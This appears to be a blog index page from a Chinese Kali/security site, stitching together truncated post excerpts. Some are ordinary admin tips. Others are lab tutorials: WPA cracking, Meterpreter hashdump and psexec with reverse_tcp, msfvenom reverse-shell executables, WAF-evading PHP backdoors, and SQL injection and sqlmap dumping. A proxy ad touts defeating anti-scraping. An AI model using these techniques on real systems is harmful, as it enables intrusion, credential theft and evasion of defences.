建站VPS工具综合杂谈

你们都是用的哪里的服务器？或者vps？如果有的话，可以推荐或者参考一下？

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！ 為什麼選擇Smart proxies？ 海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP； 高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定； 高速連線－優質線路，低延遲，確保流暢體驗； 性價比高－彈性套餐，隨選購買，低成本高收益； 便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。 適用場景： 爬蟲資料收集，突破反爬限制 跨境電商，防關聯操作 遊戲加速，暢玩全球服 社媒行銷，多帳號管理 限時優惠活動 現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！ 官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理： 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____

漏洞介绍File Inclusion(文件包含漏洞)概述 文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直接包含（引入）另外一个代码文件。 比如 在PHP中，提供了： include(),include_once() require(),require_once() 这些文件包含函数，这些函数在代码设计中被经常使用到。 大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现安全问题。 但是，有些时候，文件包含的代码文件被写成了一个变量，且这个变量可以由前端用户传进来，这种情况下，如果没有做足够的安全考虑，则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行，从而造成恶意操作。 根据不同的配置环境，文件包含漏洞分为如下两种情况： 1.本地文件包含漏洞：仅能够对服务器本地的文件进行包含，由于服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些 固定的系统配置文件，从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。 2.远程文件包含漏洞：能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。 因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。 你可以通过“File Inclusion”对应的测试栏目，来进一步的了解该漏洞。 本地文件包含漏洞我们在网站的根目录新建一…

本来一直就用的阿里云的服务器，这两天想给网站添加CDN服务，刚开始用的是又拍云，但是效果不是很明显，试了下阿里云的cdn效果杠杠的。可是晚上睡觉的时候，发来短信却说劳资有他们阿里云的二毛钱欠费，mmp后台登录看了下，是cdn产生的费用！在认真看了下，说是先使用后扣费！艹！！！ 没办法，看了下，有卖的流量包，于是又买了100GB的流浪包，可是买后又发现居然是全站加速的！日了狗！ 打算放弃CDN了！

前言平时自己比较赖，论坛和博客平时都需要维护。比如数据库备份，那么在平时的工作中怎么高效的完成数据库备份任务呢？ 废话不在多说，上源码。 源码#! /bin/ sj=`date +%Y%m%d%H%M%S` read -p "要备份的数据库名：" sql mysqldump -u root -p $sql >/root/bf/数据库$sql备份`date +%Y%m%d%H%M%S`.sql echo "备份时间：$sj" >> /root/bf/log.txt。 echo "恭喜！数据库以备份"使用说明先在root目录下新建个bf文件夹将文件保存为sql.sh给脚本给与权限chmod -R 777 sql.sh终端命令./sql.sh输入要备份的数据库名称即可开始备份log.txt用来记录备份的日志。

John@ john the ripper是一个快速的密码破解工具，用于在已知密文的情况下尝试破解出明文的破解密码软件，支持目前大多数的加密算法，如des、md4、md5等。它支持多种不同类型的系统架构，包括unix、linux、windows、dos模式、beos和openvms，主要目的是破解不够牢固的unix/linux系统密码。先将抓到的握手包转变为John的专用格式hcxpcaptool -j 11.john 11.cap这里11.cap就是我们抓到的握手包 载入字典进行破解john -w:/root/zidian/pass.txt --format=wpapsk 11.john其中/root/zidian/pass.txt为我们的字典路径 可以看到，密码已经跑出来了。当然我们也可以用下面命令查看当前的密码 john --show 11.john hashcat同样还是先将cap包转变为hashcat的包 hcxpcaptool -o 22.hccapx hs/handshake_ChinaNetfDtL_80-C7-C5-34-29-9D_2019-03-14T21-51-35.cap进行跑字典 hashcat --quiet -m 2500 22.hccapx /root/zidian/pass.txt --force若提示如下： 一般是虚拟机中kali没有安装显卡驱动造成的，因为hashcat支持用显卡来提高破解速度。只需要安装显卡驱动就行了。如果实在不行，你在windows下安装hashcat即可。 cowpat…

获取管理员hash获得shell后，执行命令 getsystem提高权限为管理员权限，接着执行命令 run post/windows/gather/hashdump获取hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e::: 权限维持执行命令 use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 443 set RHOST 192.168.232.204 set SMBUser Administrator show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.232.204 yes The target address RPORT 445 yes The SMB service …

该漏洞产生的根本原因在于ECShop系统的user.php文件中，display函数的模板变量可控，导致注入，配合注入可达到远程代码执行的效果。使得攻击者无需登录等操作，直接可以获得服务器的权限。 首先从user.php文件入手，代码中可以看到，系统读取HTTP_REFERER传递过来的内容赋值给$back_act变量。接着以$back_act的值为参数，调用assign方法。 /* 用户登录界面 */ elseif ($action == 'login') { if (empty($back_act)) { if (empty($back_act) && isset($GLOBALS['_SERVER']['HTTP_REFERER'])) { $back_act = strpos($GLOBALS['_SERVER']['HTTP_REFERER'], 'user.php') ? './index.php' : $GLOBALS['_SERVER']['HTTP_REFERER']; } else { $back_act = 'user.php'; } } $captcha = intval($_CFG['captcha']); if (($captcha & CAPTCHA_LOGIN) && (!($cap…

#写在前面： 过狗相关的资料网上也是有很多，所以在我接下来的文章中，可能观点或者举例可能会与网上部分雷同，或者表述不够全面。 但是我只能说，我所传达给大家的信息，是我目前所掌握或者了解的，不能保证所有人都会有收获，但是个人水平有限，可能您觉得文章水平过低，或者并无太大营养。但是跳出文章本身，无论何种技术，重在交流，分享与总结。 另外，希望年轻人不要有太多戾气，更多的是需要保持一个谦逊态度对待技术，尤其是这个浮躁的安全界。 以上是我的开场白（没办法，这是我的一贯风格） 写php后门连载的目的。希望大家能够暂缓日站的脚步，静下心来想一想，我们在用菜刀做一些除(sang)暴(jin)安(tian)良(liang)的事的时候，php做了些什么，安全狗又蜷缩在门后目睹了些什么。 其实我更愿意传授安全之道，而非渗透之术。 参考过网上很多种已有的php后门的写法，总之思路各种奇葩与新奇，但是衡量一个优秀的php后门并不是单单的看代码多少，过狗怎么样，而是一种基于实际场景的一种变通，所以，php后门这是一门艺术。 连接后门时发生了什么所以当我在菜刀中双击连接的时候到底发生了什么，安全狗又是如何发现后门并拦截的？ php后门原理很简单，当我们连接时，实际上我们会向php文件post数据，这个数据的内容为我们需要php去执行的代码，当php获取到数据并执行后，将返回一个response。 那么waf能够识别到什么层次？其实waf最多获取到tcp数据，也就是说，可以获取到我们所post的数据，与服务器所返回的数据，至于php执行命令的过程，用了什么对象，走了什…

题记当今社会，网络技术飞速发展。但是面临的信息安全问题越来越突出，信息泄露、个人的隐私被曝光、聊天记录被监听等等。通常我们会在各种平台上看到一些类似于阅后即焚效果的网站。很大程度上保护了我们的隐私，但是真真的是阅后即焚吗？比如 你发的朋友圈，在删除了这条朋友圈，你确定在服务器上真实删除了吗？结果就不为人知了？ 利用kali安装阅后即焚，实现真正意义的保护个人隐私。 首先启动apacher 和mysql service apache2 start service mysql start由于kali是默认安装了apacher mysql php7.3我们就跳过具体的安装过程了！ 配置mysql kali自带mysql配置 kali是自带mysql服务，今天我们来看看，如何配置mysql。启动myslqservice mysql sta... 根据上诉文章，配置好mysql的登录账号。登录mysql创建数据库！mysql -u root -p #登录数据库 create database yue; #创建了一个名为yue的数据库 show databases; #显示当前创建的数据库 复制源码下载源码 ，复制到/var/www/html 对文件进行解压 unzip PasteBurn.zip 将解压的文件复制到根目录 修改配置文件config.php 域名这里我们填写kali的ip地址 安装在浏览器中执行 http://kali ip/install.php即可完成安装！ 但是，我们这样搭建后，只能通过内网设备…

在CentOS6上面安装phpmyadmin前，加入repo： rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt yum install http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpmyum -y install phpmyadmin但是发现资源里面根本没有phpmyadmin源。 所以我们可以通过安装REPO的一个软件： yum install epel-release 之后执行： yum -y install phpmyadmin即可。

注入原理在magic_quotes_gpc=On的情况下，提交的参数中如果带有单引号’，就会被自动转义\’，使很多注入攻击无效， GBK双字节编码：一个汉字用两个字节表示，首字节对应0×81-0xFE，尾字节对应0×40-0xFE（除0×7F），刚好涵盖了转义符号\对应的编码0×5C。 0xD50×5C 对应了汉字“诚”，URL编码用百分号加字符的16进制编码表示字符，于是 %d5%5c 经URL解码后为“诚”。 下面分析攻击过程： /test.php?username=test%d5′%20or%201=1%23&pwd=test 经过浏览器编码，username参数值为(单引号的编码0×27) username=test%d5%27%20or%201=1%23 经过php的url解码 username=test 0xd5 0×27 0×20 or 0×20 1=1 0×23 (为了便于阅读，在字符串与16进制编码之间加了空格) 经过PHP的GPC自动转义变成(单引号0×27被转义成\’对应的编码0×5c0×27)： username=test 0xd5 0×5c 0×27 0×20 or 0×20 1=1 0×23 因为在数据库初始化连接的时候SET NAMES ‘gbk’，0xd50×5c解码后为诚，0×27解码为’，0×20为空格，0×23为mysql的注释符# 上面的SQL语句最终为： SELECT * FROM user WHERE username=’test诚’ or 1=1#’ and password=’tes…

Nessus介绍Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 下载安装包因为kali之基于Debian深度开发，我们按照相应是系统位数下载即可。 需要注意的是i386是32位系统。 温馨提示！ 请用Google浏览器下载因为！因为！因为！因为！因为！贼J快！快！快！快！快！快！快！ 安装贼J 13简单，把下载的Nessus-8.6.0-debian6_amd64.deb复制到kali。执行命令即可 dpkg -i Nessus-8.6.0-debian6_amd64.deb 启动服务sudo service nessusd startps:注意nessusd是启动服务，而不是启动程序。 获取激活码方法一 然后打开这个网页：https://www.tenable.com/products/nessus-home 随便输入，邮箱保证能收到邮件就好了。 方法二 运行程序后，在软件框输入 在邮箱中获取激活码 运行程序在kali的浏览器中输入https://localhost:8834/ 会提示证书错误信息，添加证书即可。 效果如下： 选择第一个 如果你选择了第一种方法获取激活码，这里直接点击跳过即可。 输入刚才我们邮箱中的激活码点击下一步 然后是漫长的等待…… 核能提示！ 如果失败！请多次重试！重试！重试！（因为贼J 13慢） 如果你运气好的话，很安装成功哦~ 输入刚才我们设置的密码，登录系统！

1.0 更改系统 apt 源Ubuntu 的软件源配置文件是 /etc/apt/sources.list 文件中。 可以将其更改为国内的软件源，例如： 清华大学开源软件镜像站 中科大开源软件镜像站 1.1 备份 sources.list 并更改：备份原来的源cp /etc/apt/sources.list /etc/apt/sources.list.back编辑源。删除打开的文件中所有行，替换为上述网站中获取到源 vi /etc/apt/sources.list(不会用 vi 的自行搜索) 1.2 更新软件列表 和 软件包#更新软件列表 sudo apt update #更新软件包 sudo apt upgrade2.0 创建 python 环境2.1 安装pip、虚虚拟环境、方便管理虚拟环境的插件 为 python 安装pip pip install python-pip安装虚拟环境 virtualenv pip install virtualenv便于管理虚拟环境的一个插件 pip install virtualenvwrapper多说一句 Windows 下的 virtualenvwrapper 为 virtualenvwrapper-win 2.2 为插件创建环境变量。二选一即可编辑当前用户的环境变量：vi ~/. rc 编辑系统环境变量：sudo vi /etc/profile 打开环境变量文件后，在底部增加如下行： export WORKON_HOME=$HOME/.virtualenvs export PROJECT_HO…

前言七牛云上传工具，利用java开发。使用演示 关于配置 项目下载： java七牛云

设备清单esp8266开发板oled (0.96)杜邦线 设备电路图 添加库u8g2库文件 项目一 Hello World/* HelloWorld.ino esp8266+oled项目实例 论坛：bbskali.cn 博客：blog.bbskali.cn */ #include <Arduino.h> #include <U8g2lib.h> #ifdef U8X8_HAVE_HW_SPI #include <SPI.h> #endif #ifdef U8X8_HAVE_HW_I2C #include <Wire.h> #endif U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/ D2, /* data=*/ D1, /* reset=*/ U8X8_PIN_NONE); // 此处 D1 D2是对应焊接的脚针 void setup(void) { u8g2.begin(); } void loop(void) { u8g2.clearBuffer(); // clear the internal memory u8g2.setFont(u8g2_font_ncenB08_tr); // choose a suitable font u8g2.drawStr(0,10,"Hello World!"); // write something to…

最近不少小伙伴在群里面讨论怎样安装输入法，其实在论坛中我之前就发布过这篇教程，今天给大家在总结下。 1. 安装fcitxapt-get install fcitxPS:顺利的话会自动安装成功，如果遇到依赖错误，按提示修复或者输入apt-get -f install修复，但是如果提示“依赖xxx，但是xxx将不会被安装”，这一般是源太旧，建议换个其他的源。 2. 安装fcitx-libs-qtapt-get install fcitx-libs-qt 3.安装搜狗输入法去搜狗输入法官网http://pinyin.sogou.com/linux/ 下载自己系统对应版本的输入法安装包。 3.1 安装搜狗输入法cd ~/下载/也可以文件浏览器在定位到下载目录，右击选择在终端中打开 dpkg -i 下载的sogo安装包文件名 嗯，提示错误，因为是部分依赖还没有安装，我们缺什么安装什么就行了。 或者执行命令apt --fix-broken install 然后，我们重新执行下面命令 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb 可以看到，没有报错。证明已经安装成功。 4.启用搜狗输入法终端中输入： im-config 进入输入法配置，选择确定，然后点击是，在弹出来的输入法选择框中选择fcitx，然后确定 。 注销账号，重新登录，然后右上角有个键盘图标，点击选择【设置】，在左下角点击【+】新增输入法 在弹出窗口中取消“仅显示当前预览”复选框，然后搜索Sogou,找到搜狗输入法，点击OK 打开编辑器，“Ctr…

一：制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二：制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三：将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四：终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > sh…

一：下载64位地址：https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址：https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二：安装下载后，将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三：运行终端命令 Stacer CPU监控

说明：一般我们在编辑文件的时候，都喜欢用WinSCP等FTP软件进行编辑，这样确实方便不少，也有时候为了方便直接用vim编辑文件。不过有时候编辑带有中文文件的时候会出现乱码的情况，这样有点影响我们的操作，这里就说下解决方法。 方法1、编辑.vimrc文件 vim .vimrc加入以下代码： set fileencodings=utf-8,ucs-bom,gb18030,gbk,gb2312,cp936 set termencoding=utf-8 set encoding=utf-8保存并退出，当然也可以用WinSCP等FTP软件在root文件夹新建并编辑.vimrc文件。 2、执行生效 source .vimrc最后我们再使用vim编辑中文文件的时候就不会出现乱码情况了。

在 Linux 系统下经常要查看各种信息，命令蛮多的，而且又是久不久用一次的那种，记不下来，每回找又麻烦，干脆自己写一份在博客里面，自己找起来也方便。系统uname -a #查看内核/操作系统/CPU信息 head -n 1 /etc/issue #查看操作系统版本 cat /etc/issue | grep Linux #查看当前操作系统内核信息 cat /proc/cpuinfo #查看CPU信息 hostname #查看计算机名 lspci -tv #列出所有PCI设备 lsusb -tv #列出所有USB设备 lsmod #列出加载的内核模块 env #查看环境变量资源free -m #查看内存使用量和交换区使用量 df -h #查看各分区使用情况 du -sh <dir> #查看指定目录的大小 cat /proc/meminfo #查看内存信息 grep MemTotal /proc/meminfo #查看内存总量 grep MemFree /proc/meminfo #查看空闲内存量 uptime #查看系统运行时间、用户数、负载 cat /proc/loadavg #查看系统…

前言：软件： burpsqlmap 软件配置 设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置 漏洞环境安装 数字型注入（post）篇利用burp抓包，将包中的文件另存为33.txt 爆出数据库sqlmap -r "/root/22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 爆出表数据sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump 视频 字符型注入打开Pikachu中的字符型注入 字符型注入 字符型注入原理是 ‘false’ or true#‘恒为真 连接数据库，输入select * id,email from member where id = ‘KOBE’ 会输出 KOBE账号的email 那么，我们可以想象如果在输入框输入一段字符，使其合理拼接到sql中，是不是就可以执行遍历了呢 我们在输入框输入 kali’ or 1 = 1# (前面一个单引号是与sql原有的’拼接 后面的#注释掉后面原有’） sqlmap注入之（搜索型）注入验证是否有注入 我们直接输入一个字符k，点击搜索。 提示未见异常 我们输入关键字%k% 效果如下： QQ截图20190404110711.png 此时，我们可以得出，存在搜索型注入漏洞 攻击方式一 利用burp抓包，将包中的文件另存为2…

kali是自带mysql服务，今天我们来看看，如何配置mysql。 启动myslqservice mysql start初始化密码执行命令 mysql_secure_installation 回车后输入你自己的密码 然后一路Y即可 如图，出现Thanks for using MariaDB!则说明初始化成功。 登录数据库mysql -u root -p这时，你会蛋疼的发现直接回车便可以登录，而不需要密码。所以我们需要执行下面命令。登录数据库（回车直接登录） use mysql; update user set plugin="";这样就可以用刚才设置的密码登录数据库。

有时会遇到文件比较大，无法查阅，需要切割才行； 命令参数： split [选项] [要切割的文件] [输出文件名前缀］ 1.首先查看文件大小 ls -lh //目标文件 android@split:~/home/split$ ls -lh 总用量 3.9G -rw-rw-r-- 1 android android 3.9G 1月 25 09:52 test.txt 2.切割，他会以a,b,c方式生成文件,小于500m的放到最后一个文件； //行数切割 split -l 100 test.txt //指定分割文件的大小为500M split -b 500m test.txt log_ 主要说一下指定分割文件的大小500m方式； android@split:~/home/split$ split -b 500m test.txt log_ //通过ls -lh查看，非常均匀； 总用量 7.7G -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_aa -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ab -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ac -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ad -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ae -r…

原因今天网站的证书快要过期了，但是下载下来发现原来的public.pem和chain.pem证书变成了.crt证书。配置老是出现错误，想着能不能将crt转换成pem。 解决方案linux命令 cat your_server1.crt COMODORSADomainValidationSecureServerCA.crt COMODORSAAddTrustCA.crt AddTrustExternalCARoot.crt > your_server2.pem 参数：your_server1.crt 表示你转格式之前的crt格式证书 参数：your_server2.pem 表示转格式之后的pem格式证书